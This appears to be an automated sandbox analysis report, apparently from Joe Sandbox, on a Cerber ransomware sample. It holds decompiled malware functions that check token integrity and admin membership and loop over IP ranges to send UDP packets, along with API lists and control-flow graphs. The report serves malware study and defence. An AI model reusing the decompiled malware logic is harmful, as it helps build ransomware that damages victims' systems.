                                                                                                                                                                                        					_push( &_v88);
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0x1a);
                                                                                                                                                                                        					_v12 = 0x44;
                                                                                                                                                                                        					if( *0x40f93c() != 0) {
                                                                                                                                                                                        						 *0x40faa4(_v8,  &_v88,  &_v16);
                                                                                                                                                                                        						FindCloseChangeNotification(_v8); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t37 = GetTokenInformation(_a4, 0x12,  &_v20, 4,  &_v12); // executed
                                                                                                                                                                                        				if(_t37 == 0 || _v20 == 3 && GetTokenInformation(_a4, 0x13,  &_v8, 4,  &_v12) == 0) {
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
                                                                                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
                                                                                                                                                                                        • CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 00402DA1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$Information$ChangeCheckCloseCreateDuplicateFindKnownMembershipNotificationWell
                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                        • API String ID: 3229538523-2746444292
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        control_flow_graph 446 407341-407373 call 405905 call 4031af 451 407672-407679 446->451 452 407379-40739a call 405905 call 4031af 446->452 452->451 457 4073a0-4073cd call 405905 call 4031af call 403253 452->457 464 4073d3-4073f3 call 4031af call 4032b8 call 401127 457->464 465 4073cf 457->465 464->451 472 4073f9-40740a call 4078f0 464->472 465->464 475 407410-4074b4 CharLowerBuffA call 40ad86 call 405905 call 405baa CharLowerBuffA call 405905 call 4031af call 403253 htons socket 472->475 476 40766a-40766d call 405463 472->476 490 407662-407665 call 405463 475->490 491 4074ba-4074e6 call 405905 call 4031af call 403156 475->491 476->451 490->476 499 407659-40765c call 405568 491->499 500 4074ec-40755a call 405905 call 40317b call 4032b8 sscanf call 40557f call 405532 491->500 504 407661 499->504 513 407560-407566 500->513 514 40764a-407653 500->514 504->490 515 407635-407639 513->515 516 40756c-40756f 513->516 514->499 514->500 515->514 518 40763b-407644 515->518 517 407614-40761a 516->517 519 407620-407624 517->519 520 407574-407577 517->520 518->513 518->514 519->515 522 407626-40762f 519->522 521 4075ff-407605 520->521 523 40760b-407610 521->523 524 40757c-40759a 521->524 522->515 522->516 523->519 525 407612 523->525 526 4075a9-4075f0 call 40555d call 405905 call 402b21 sendto 524->526 527 40759c-4075a3 Sleep 524->527 525->517 534 4075f2 526->534 535 4075f6-4075fb 526->535 527->526 534->535 535->523 536 4075fd 535->536 536->521
                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                        			E00407341(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                        				signed int _v6;
                                                                                                                                                                                        				char _v7;
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                        				intOrPtr _v13;
                                                                                                                                                                                        				intOrPtr _v14;
                                                                                                                                                                                        				intOrPtr _v15;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				CHAR* _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				char _v29;
                                                                                                                                                                                        				char _v30;
                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				char _v49;
                                                                                                                                                                                        				char _v50;
                                                                                                                                                                                        				char _v51;
                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                        				short _v54;
                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                        				char* _v60;
                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				signed char _v84;
                                                                                                                                                                                        				char _v188;
                                                                                                                                                                                        				char _v292;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                        				char* _t98;
                                                                                                                                                                                        				CHAR* _t99;
                                                                                                                                                                                        				long _t106;
                                                                                                                                                                                        				void* _t108;
                                                                                                                                                                                        				signed short _t111;
                                                                                                                                                                                        				short _t114;
                                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                                        				char _t135;
                                                                                                                                                                                        				char _t136;
                                                                                                                                                                                        				char _t141;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				intOrPtr _t147;
                                                                                                                                                                                        				intOrPtr _t148;
                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                                        				void* _t159;
                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                                        				char _t175;
                                                                                                                                                                                        				void* _t176;
                                                                                                                                                                                        				CHAR* _t178;
                                                                                                                                                                                        				short _t181;
                                                                                                                                                                                        				void* _t184;
                                                                                                                                                                                        				void* _t185;
                                                                                                                                                                                        				void* _t186;
                                                                                                                                                                                        				void* _t187;
                                                                                                                                                                                        				void* _t191;
                                                                                                                                                                                        				void* _t192;
                                                                                                                                                                                        				signed int _t199;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t168 = __edx;
                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                        				_t83 = E00405905(0x40d534, 7, 0xfd311b35);
                                                                                                                                                                                        				_t185 = _t184 + 0xc;
                                                                                                                                                                                        				_t176 = E004031AF(_a4, __eflags, _t83);
                                                                                                                                                                                        				_t196 = _t176;
                                                                                                                                                                                        				if(_t176 != 0) {
                                                                                                                                                                                        					_t87 = E00405905( &E0040D53C, 0xa, 0xfcf57ebc);
                                                                                                                                                                                        					_t186 = _t185 + 0xc;
                                                                                                                                                                                        					_t150 = E004031AF(_t176, _t196, _t87);
                                                                                                                                                                                        					_t197 = _t150;
                                                                                                                                                                                        					if(_t150 != 0) {
                                                                                                                                                                                        						_t90 = E00405905(0x40d548, 7, 0x9c7f3440);
                                                                                                                                                                                        						_t187 = _t186 + 0xc;
                                                                                                                                                                                        						_t93 = E00403253(E004031AF(_t150, _t197, _t90), _t197);
                                                                                                                                                                                        						_v20 = _v20 & 0x00000000;
                                                                                                                                                                                        						_v40 = _t93;
                                                                                                                                                                                        						if(_t93 == 0) {
                                                                                                                                                                                        							_t6 =  &_v40;
                                                                                                                                                                                        							 *_t6 = _v40 | 0xffffffff;
                                                                                                                                                                                        							_t199 =  *_t6;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t169 = E004031AF(_t150, _t199, _a8);
                                                                                                                                                                                        						_t98 = E00401127(0, E004032B8(_t95, _t199));
                                                                                                                                                                                        						_v60 = _t98;
                                                                                                                                                                                        						if(_t98 != 0) {
                                                                                                                                                                                        							_t99 = E004078F0(_t98,  &_v20, _t168,  &_v20); // executed
                                                                                                                                                                                        							_t178 = _t99;
                                                                                                                                                                                        							_pop(_t159);
                                                                                                                                                                                        							_v24 = _t178;
                                                                                                                                                                                        							_t201 = _t178;
                                                                                                                                                                                        							if(_t178 != 0) {
                                                                                                                                                                                        								CharLowerBuffA(_t178, _v20);
                                                                                                                                                                                        								E0040AD86(_t159, _t178, _v20,  &_v84);
                                                                                                                                                                                        								_t106 = E00405BAA(_t150,  &_v24, _t169, _t178, _t201);
                                                                                                                                                                                        								_v20 = _t106;
                                                                                                                                                                                        								CharLowerBuffA(_v24, _t106);
                                                                                                                                                                                        								_t108 = E00405905(0x40d558, 4, 0x60ae4eaf);
                                                                                                                                                                                        								_t191 = _t187 + 0x30;
                                                                                                                                                                                        								_t111 = E00403253(E004031AF(_t150, _t201, _t108), _t201);
                                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                                        								asm("stosd");
                                                                                                                                                                                        								_t181 = 2;
                                                                                                                                                                                        								asm("stosw");
                                                                                                                                                                                        								_v56 = _t181;
                                                                                                                                                                                        								_t114 =  *0x40e020(_t111 & 0x0000ffff, _v20, E00405905(0x40d550, 4, 0x8ba91a9e), _v84 & 0x000000ff);
                                                                                                                                                                                        								_v54 = _t114;
                                                                                                                                                                                        								_t115 =  *0x40e000(_t181, _t181, 0x11); // executed
                                                                                                                                                                                        								_v36 = _t115;
                                                                                                                                                                                        								_t202 = _t115 - 0xffffffff;
                                                                                                                                                                                        								if(_t115 != 0xffffffff) {
                                                                                                                                                                                        									_t117 = E00405905(0x40d560, _t181, 0x7d18c472);
                                                                                                                                                                                        									_t192 = _t191 + 0xc;
                                                                                                                                                                                        									_t183 = E004031AF(_t150, _t202, _t117);
                                                                                                                                                                                        									_t120 = E00403156(_t119, _t202);
                                                                                                                                                                                        									_v28 = _v28 & 0x00000000;
                                                                                                                                                                                        									_v68 = _t120;
                                                                                                                                                                                        									_t203 = _t120;
                                                                                                                                                                                        									if(_t120 != 0) {
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											_push( &_v64);
                                                                                                                                                                                        											_push( &_v292);
                                                                                                                                                                                        											_push( &_v188);
                                                                                                                                                                                        											_push(E00405905(0x40d564, 0xb, 0xb32d2f4a));
                                                                                                                                                                                        											sscanf(E004032B8(E0040317B(_t183, _t203, _v28), _t203));
                                                                                                                                                                                        											_t192 = _t192 + 0x20;
                                                                                                                                                                                        											_t172 = E0040557F(_v64);
                                                                                                                                                                                        											_t152 = E00405532( &_v188) & _t172;
                                                                                                                                                                                        											_v16 =  !_t172 | _t152;
                                                                                                                                                                                        											_t175 = 0;
                                                                                                                                                                                        											_v32 = _t152;
                                                                                                                                                                                        											_v5 = _t152;
                                                                                                                                                                                        											if(_t152 <= _v16) {
                                                                                                                                                                                        												do {
                                                                                                                                                                                        													_v6 = _t152;
                                                                                                                                                                                        													if(_t152 <= _v15) {
                                                                                                                                                                                        														do {
                                                                                                                                                                                        															_t135 = _v30;
                                                                                                                                                                                        															while(1) {
                                                                                                                                                                                        																_v8 = _t135;
                                                                                                                                                                                        																if(_t135 > _v14) {
                                                                                                                                                                                        																	break;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																_t136 = _v29;
                                                                                                                                                                                        																while(1) {
                                                                                                                                                                                        																	_v7 = _t136;
                                                                                                                                                                                        																	__eflags = _t136 - _v13;
                                                                                                                                                                                        																	if(_t136 > _v13) {
                                                                                                                                                                                        																		break;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	_v52 = _v5;
                                                                                                                                                                                        																	_v51 = _v6;
                                                                                                                                                                                        																	_v50 = _v8;
                                                                                                                                                                                        																	_v49 = _v7;
                                                                                                                                                                                        																	_t141 = _t175;
                                                                                                                                                                                        																	_t175 = _t175 + 1;
                                                                                                                                                                                        																	__eflags = _t141 - _v40;
                                                                                                                                                                                        																	if(_t141 == _v40) {
                                                                                                                                                                                        																		_t175 = 0; // executed
                                                                                                                                                                                        																		__eflags = 0;
                                                                                                                                                                                        																		Sleep(0x3e8); // executed
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	E00402B21(_t152, _t168, _t175, _t183);
                                                                                                                                                                                        																	_t192 = _t192 + 0x1c;
                                                                                                                                                                                        																	_t146 =  *0x40e01c(_v36, _v24, _v20, 0,  &_v56, 0x10, _a4, E00405905(0x40d570, 0x13, 0xb66841e3), E0040555D(_v52), _v24); // executed
                                                                                                                                                                                        																	__eflags = _t146 - _v20;
                                                                                                                                                                                        																	if(_t146 == _v20) {
                                                                                                                                                                                        																		_v9 = 1;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	_t147 = _v7;
                                                                                                                                                                                        																	__eflags = _t147 - 0xff;
                                                                                                                                                                                        																	if(_t147 != 0xff) {
                                                                                                                                                                                        																		_t136 = _t147 + 1;
                                                                                                                                                                                        																		__eflags = _t136;
                                                                                                                                                                                        																		continue;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	break;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																_t148 = _v8;
                                                                                                                                                                                        																__eflags = _t148 - 0xff;
                                                                                                                                                                                        																if(__eflags != 0) {
                                                                                                                                                                                        																	_t135 = _t148 + 1;
                                                                                                                                                                                        																	__eflags = _t135;
                                                                                                                                                                                        																	continue;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																break;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															if(_v6 != 0xff) {
                                                                                                                                                                                        																goto L23;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															goto L24;
                                                                                                                                                                                        															L23:
                                                                                                                                                                                        															_v6 = _v6 + 1;
                                                                                                                                                                                        														} while (_v6 <= _v15);
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L24:
                                                                                                                                                                                        													if(_v5 != 0xff) {
                                                                                                                                                                                        														goto L25;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													goto L26;
                                                                                                                                                                                        													L25:
                                                                                                                                                                                        													_v5 = _v5 + 1;
                                                                                                                                                                                        												} while (_v5 <= _v16);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L26:
                                                                                                                                                                                        											_v28 = _v28 + 1;
                                                                                                                                                                                        										} while (_v28 < _v68);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									E00405568(_v36);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								E00405463(_v24);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_v60);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                        			}







































































                                                                                                                                                                                        0x004074e4
                                                                                                                                                                                        0x004074e6
                                                                                                                                                                                        0x004074ec
                                                                                                                                                                                        0x004074ef
                                                                                                                                                                                        0x004074f6
                                                                                                                                                                                        0x004074fd
                                                                                                                                                                                        0x00407512
                                                                                                                                                                                        0x00407524
                                                                                                                                                                                        0x0040752d
                                                                                                                                                                                        0x00407535
                                                                                                                                                                                        0x00407545
                                                                                                                                                                                        0x0040754b
                                                                                                                                                                                        0x0040754e
                                                                                                                                                                                        0x00407551
                                                                                                                                                                                        0x00407554
                                                                                                                                                                                        0x0040755a
                                                                                                                                                                                        0x00407560
                                                                                                                                                                                        0x00407560
                                                                                                                                                                                        0x00407566
                                                                                                                                                                                        0x0040756c
                                                                                                                                                                                        0x0040756c
                                                                                                                                                                                        0x00407614
                                                                                                                                                                                        0x00407614
                                                                                                                                                                                        0x0040761a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407574
                                                                                                                                                                                        0x004075ff
                                                                                                                                                                                        0x004075ff
                                                                                                                                                                                        0x00407602
                                                                                                                                                                                        0x00407605
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040757f
                                                                                                                                                                                        0x00407585
                                                                                                                                                                                        0x0040758b
                                                                                                                                                                                        0x00407591
                                                                                                                                                                                        0x00407594
                                                                                                                                                                                        0x00407596
                                                                                                                                                                                        0x00407597
                                                                                                                                                                                        0x0040759a
                                                                                                                                                                                        0x004075a1
                                                                                                                                                                                        0x004075a1
                                                                                                                                                                                        0x004075a3
                                                                                                                                                                                        0x004075a3
                                                                                                                                                                                        0x004075ce
                                                                                                                                                                                        0x004075d3
                                                                                                                                                                                        0x004075e7
                                                                                                                                                                                        0x004075ed
                                                                                                                                                                                        0x004075f0
                                                                                                                                                                                        0x004075f2
                                                                                                                                                                                        0x004075f2
                                                                                                                                                                                        0x004075f6
                                                                                                                                                                                        0x004075f9
                                                                                                                                                                                        0x004075fb
                                                                                                                                                                                        0x004075fd
                                                                                                                                                                                        0x004075fd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004075fd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004075fb
                                                                                                                                                                                        0x0040760b
                                                                                                                                                                                        0x0040760e
                                                                                                                                                                                        0x00407610
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407610
                                                                                                                                                                                        0x00407624
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407626
                                                                                                                                                                                        0x00407626
                                                                                                                                                                                        0x0040762c
                                                                                                                                                                                        0x0040756c
                                                                                                                                                                                        0x00407635
                                                                                                                                                                                        0x00407639
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040763b
                                                                                                                                                                                        0x0040763b
                                                                                                                                                                                        0x00407641
                                                                                                                                                                                        0x00407560
                                                                                                                                                                                        0x0040764a
                                                                                                                                                                                        0x0040764a
                                                                                                                                                                                        0x00407650
                                                                                                                                                                                        0x004074ec
                                                                                                                                                                                        0x0040765c
                                                                                                                                                                                        0x00407661
                                                                                                                                                                                        0x00407665
                                                                                                                                                                                        0x00407665
                                                                                                                                                                                        0x0040766d
                                                                                                                                                                                        0x0040766d
                                                                                                                                                                                        0x004073f3
                                                                                                                                                                                        0x0040739a
                                                                                                                                                                                        0x00407679

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        • CharLowerBuffA.USER32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407414
                                                                                                                                                                                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?), ref: 00407459
                                                                                                                                                                                        • htons.WS2_32 ref: 0040749A
                                                                                                                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 004074A8
                                                                                                                                                                                        • sscanf.MSVCRT ref: 00407524
                                                                                                                                                                                          • Part of subcall function 0040557F: htonl.WS2_32(?), ref: 0040558D
                                                                                                                                                                                          • Part of subcall function 00405532: inet_addr.WS2_32(Cu@), ref: 00405537
                                                                                                                                                                                          • Part of subcall function 00405532: gethostbyname.WS2_32(?), ref: 00405548
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BuffCharLower$gethostbynamehtonlhtonsinet_addrlstrcmpisocketsscanf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2857926056-0
                                                                                                                                                                                        • Opcode ID: 03d8161cffbd0b3667f532098a1c66c307f98ab70770e3fbebd962e44b3806ab
                                                                                                                                                                                        • Instruction ID: 78b374b52b19eb6b1b31afc7c374d959c6df6e4001e96d7b0c5d057715c2210f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 03d8161cffbd0b3667f532098a1c66c307f98ab70770e3fbebd962e44b3806ab
                                                                                                                                                                                        • Instruction Fuzzy Hash: E291F971D04248BEDF01ABF99C02AEF7F75AF05314F1404BAF454B62C2D6395A068B6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 537 409c8e-409ccf RtlInitializeCriticalSection call 40692e call 405905 call 4031af 544 409cd5-409cf8 call 405905 call 4031af 537->544 545 409dbb-409de8 call 409215 call 405905 call 4031af 537->545 554 409db6 call 409857 544->554 555 409cfe-409d10 call 403156 544->555 561 409fc1-409fe4 call 405905 call 4031af 545->561 562 409dee-409e0f call 405905 call 4031af 545->562 554->545 555->554 564 409d16-409d28 call 40317b 555->564 576 409fea-40a00b call 405905 call 4031af 561->576 577 40a07d-40a0a3 CreateWellKnownSid 561->577 579 409e11-409e19 562->579 580 409e5c-409e7b call 405905 call 4031af 562->580 573 409da4-409db0 564->573 574 409d2a-409d3a call 403156 564->574 573->554 573->564 574->573 589 409d3c-409d62 call 402fed call 40317b call 40314d call 409518 574->589 576->577 605 40a00d-40a065 call 40591c call 4099d8 call 40591c call 4099d8 call 409afd * 2 call 409518 576->605 584 409e1b-409e31 call 40562b 579->584 585 409e4d-409e57 call 409518 579->585 601 409e81-409e95 call 409518 580->601 602 409f14-409f33 call 405905 call 4031af 580->602 597 409e33-409e3f call 402ff6 call 403144 call 405463 584->597 598 409e44-409e4b 584->598 585->580 634 409d64-409d8c call 4053ca 589->634 635 409d8f-409da2 call 403085 589->635 597->598 598->584 598->585 601->602 617 409e97-409eb7 call 4053ca 601->617 602->561 626 409f39-409f4d call 409518 602->626 664 40a067-40a076 call 4053b4 605->664 665 40a078 call 409c5c 605->665 632 409eb9-409ebb 617->632 633 409ebd-409ec3 617->633 626->561 642 409f4f-409f6b call 4053ca 626->642 632->602 633->602 638 409ec5-409ef0 call 40591c call 405b0c 633->638 634->635 635->573 635->589 655 409ef5-409f06 638->655 653 409f6d-409fbc call 40591c wsprintfW CharLowerBuffW call 408e00 642->653 654 409fbe 642->654 653->561 654->561 658 409f08-409f09 655->658 659 
409f0b-409f12 655->659 658->659 659->602 659->638 664->577 664->665 665->577
                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                        			E00409C8E(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                        				short _v56;
                                                                                                                                                                                        				short _v64;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                        				long _t93;
                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                        				signed int* _t105;
                                                                                                                                                                                        				signed int* _t109;
                                                                                                                                                                                        				intOrPtr _t111;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                        				intOrPtr _t125;
                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                        				signed int _t134;
                                                                                                                                                                                        				intOrPtr _t137;
                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                        				signed int* _t154;
                                                                                                                                                                                        				signed int* _t155;
                                                                                                                                                                                        				signed int* _t157;
                                                                                                                                                                                        				signed int* _t160;
                                                                                                                                                                                        				signed int* _t161;
                                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                        				void* _t167;
                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                        				signed int _t171;
                                                                                                                                                                                        				void* _t172;
                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                        				void* _t179;
                                                                                                                                                                                        				signed int _t181;
                                                                                                                                                                                        				void* _t186;
                                                                                                                                                                                        				signed int* _t189;
                                                                                                                                                                                        				signed int* _t190;
                                                                                                                                                                                        				signed int* _t191;
                                                                                                                                                                                        				signed int* _t192;
                                                                                                                                                                                        				signed int* _t195;
                                                                                                                                                                                        				signed int* _t196;
                                                                                                                                                                                        				void* _t199;
                                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                                        				void* _t211;
                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                        				signed int _t224;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t199 = __eflags;
                                                                                                                                                                                        				_t172 = __edx;
                                                                                                                                                                                        				 *0x40f1d8(0x42fad4);
                                                                                                                                                                                        				E0040692E(__ecx, E00409B30, 0); // executed
                                                                                                                                                                                        				_t53 = E00405905( &E0040D17C, 7, 0x80c426c8);
                                                                                                                                                                                        				_t189 =  &(( &_v80)[5]);
                                                                                                                                                                                        				_t177 = E004031AF(_v0, _t199, _t53);
                                                                                                                                                                                        				_t200 = _t177;
                                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                                        					L10:
                                                                                                                                                                                        					E00409215(_t172, _t208, _v0);
                                                                                                                                                                                        					_t57 = E00405905( &E0040D668, 9, 0x9c36dbf2);
                                                                                                                                                                                        					_t190 =  &(_t189[3]);
                                                                                                                                                                                        					_t186 = E004031AF(_v0, _t208, _t57);
                                                                                                                                                                                        					_t209 = _t186;
                                                                                                                                                                                        					if(_t186 == 0) {
                                                                                                                                                                                        						L30:
                                                                                                                                                                                        						_t60 = E00405905(0x40d834, 9, 0xd1c1cf3d);
                                                                                                                                                                                        						_t191 =  &(_t190[3]);
                                                                                                                                                                                        						_t178 = E004031AF(_v0, _t219, _t60);
                                                                                                                                                                                        						_t220 = _t178;
                                                                                                                                                                                        						if(_t178 == 0) {
                                                                                                                                                                                        							L35:
                                                                                                                                                                                        							 *0x40f93c(0x16, 0, 0x42fa80,  &E0040FC68);
                                                                                                                                                                                        							_t224 =  *0x42fa7c; // 0x63d4610
                                                                                                                                                                                        							return 0 | _t224 != 0x00000000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t66 = E00405905( &E0040D814, 7, 0x79d16581);
                                                                                                                                                                                        						_t192 =  &(_t191[3]);
                                                                                                                                                                                        						_t179 = E004031AF(_t178, _t220, _t66);
                                                                                                                                                                                        						_pop(_t143);
                                                                                                                                                                                        						_t221 = _t179;
                                                                                                                                                                                        						if(_t179 == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E004099D8(_t143, _t175, E0040591C(0x40d840, 0xf, 0x514e394d));
                                                                                                                                                                                        						_t192[3] = 0x3735a35c;
                                                                                                                                                                                        						E004099D8(_t143, _t175, E0040591C());
                                                                                                                                                                                        						E00409AFD(_t221, 0x1a); // executed
                                                                                                                                                                                        						E00409AFD(_t221, 0x1c); // executed
                                                                                                                                                                                        						_t146 = 0x40d850;
                                                                                                                                                                                        						_t75 = E00409518(_t146, _t179, 3);
                                                                                                                                                                                        						_t148 = 0xe;
                                                                                                                                                                                        						 *0x42fa74 = _t75;
                                                                                                                                                                                        						if(_t75 != 0) {
                                                                                                                                                                                        							L34:
                                                                                                                                                                                        							E00409C5C(_t223); // executed
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_push(0xc);
                                                                                                                                                                                        						_t77 = E004053B4(_t148);
                                                                                                                                                                                        						 *0x42fa74 = _t77;
